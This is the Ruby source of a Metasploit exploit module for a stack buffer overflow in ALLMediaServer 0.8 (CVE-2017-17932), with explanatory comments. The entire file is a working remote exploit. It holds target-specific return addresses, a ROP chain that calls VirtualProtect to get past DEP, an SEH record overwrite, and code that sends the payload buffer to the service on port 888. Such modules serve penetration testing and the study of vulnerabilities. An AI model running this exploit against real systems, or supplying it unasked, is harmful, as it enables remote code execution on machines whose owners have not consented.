##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the stack buffer overflow in ALLMediaServer 0.8
  # described in 'Description' / 'References' below. The Tcp mixin supplies
  # connect / sock / disconnect and the Seh mixin supplies
  # generate_seh_record; both are used in #exploit.
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  # Registers the module metadata with the framework and sets the default
  # RPORT to 888.
  #
  # Target 0 (Windows XP SP3) carries the keys used by the ROP branch of
  # #exploit ('Ret', 'OffsetRop', 'jmp', 'Offset'); target 1 (Windows 7 SP1,
  # the default) carries only 'Ret' and 'Offset'.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ALLMediaServer 0.8 Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability
          is caused due to a boundary error within the handling of HTTP request.

          While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't
          reliable across virtual (VMWare, VirtualBox) and physical environments. Because of
          this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default
          DEP is OptIn and AllMediaServer won't run with DEP.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'motaz reda <motazkhodair[at]gmail.com>', # Original discovery
          'modpr0be <tom[at]spentera.com>', # Metasploit module
          'juan vazquez' # More improvement
        ],
        'References' => [
          [ 'CVE', '2017-17932' ],
          [ 'OSVDB', '83889' ],
          [ 'EDB', '19625' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread', # none/process/thread/seh
        },
        'Platform' => 'win',
        'Payload' => {
          'BadChars' => "",
          'Space' => 660, # upper bound on the size of payload.encoded
          'DisableNops' => true
        },

        'Targets' => [
          [
            'ALLMediaServer 0.8 / Windows XP SP3 - English',
            {
              'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
              'OffsetRop' => 696,
              'jmp' => 264,
              'Offset' => 1072
            }
          ],
          [
            'ALLMediaServer 0.8 / Windows 7 SP1 - English',
            {
              'Ret' => 0x6ac5cc92, # ppr from avformat-53.dll
              'Offset' => 1072
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-07-04',
        'DefaultTarget' => 1,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(888)])
  end

  # Returns +n+ copies of one random 32-bit value: four random alpha bytes
  # unpacked as a native-endian unsigned int. Used as a don't-care slot in
  # the ROP chain built in #exploit.
  #
  # @param n [Integer] number of copies; Array multiplication repeats the
  #   same value, so all +n+ entries are identical
  # @return [Array<Integer>]
  def junk(n = 1)
    return [rand_text_alpha(4).unpack("L")[0]] * n
  end

  # Returns +n+ filler dwords. With +rop+ true this is the address
  # 0x665a0aa1 (used as a "ROP NOP" in #exploit), otherwise 0x90909090
  # (four x86 NOP bytes).
  #
  # @param rop [Boolean] choose the ROP-style filler instead of raw NOPs
  # @param n [Integer] number of dwords
  # @return [Array<Integer>]
  def nops(rop = false, n = 1)
    return rop ? [0x665a0aa1] * n : [0x90909090] * n
  end

  # Assembles x86 (Ia32) assembly source with Metasm and returns the raw
  # machine code as a binary String.
  #
  # @param code [String] assembly source
  # @return [String]
  def asm(code)
    Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
  end

  # Connects to RHOST:RPORT, builds the overflow buffer for the selected
  # target and writes it to the socket.
  #
  # Both targets end with an SEH record (generate_seh_record(target.ret))
  # placed 'Offset' bytes into the buffer, followed by payload.encoded. The
  # Windows 7 target uses plain random padding before the record (no DEP
  # bypass, see 'Description'); the XP target places the ROP chain at
  # 'OffsetRop', then a relative jmp of 'jmp' bytes, then padding up to
  # 'Offset'.
  def exploit
    # with help from mona :)
    # Absolute gadget addresses; the inline comments name the DLL each one
    # was taken from. Packed as little-endian dwords ("V*"). Note the chain
    # is built unconditionally even though only the XP branch below uses it.
    rop = [
      nops(true, 12), # ROP NOP
      0x65f6faa7, # POP EAX # RETN
      0x671ee4e0, # ptr to &VirtualProtect()
      0x6ac1ccb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN
      0x667ceedf, # PUSH EAX # POP ESI # POP EDI # RETN
      junk,
      0x65f5f09d, # POP EBP # RETN
      0x65f9830d, # & call esp
      0x6ac1c1d5, # POP EBX # RETN
      0x00000600, # 0x00000320-> ebx
      0x6672a1e2, # POP EDX # RETN
      0x00000040, # 0x00000040-> edx
      0x665a09df, # POP ECX # RETN
      0x6ad58a3d, # &Writable location
      0x6ac7a771, # POP EDI # RETN
      nops(true), # RETN (ROP NOP)
      0x6682f9f4, # POP EAX # RETN
      nops, # nop
      0x663dcbd2 # PUSHAD # RETN
    ].flatten.pack("V*")

    connect

    # Target 1 ("... Windows 7 SP1 ...") matches; target 0 takes the else branch.
    if target.name =~ /Windows 7/
      buffer = rand_text(target['Offset'])
      buffer << generate_seh_record(target.ret)
      buffer << payload.encoded
    else
      buffer = rand_text(target['OffsetRop']) # junk
      buffer << rop
      # target['jmp'] is 264, rendered in hex: "jmp $+0x108"
      buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
      # pad so the SEH record sits at 'Offset', as in the Windows 7 branch
      buffer << rand_text(target['Offset'] - buffer.length)
      buffer << generate_seh_record(target.ret)
      buffer << payload.encoded
    end

    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)

    disconnect
  end
end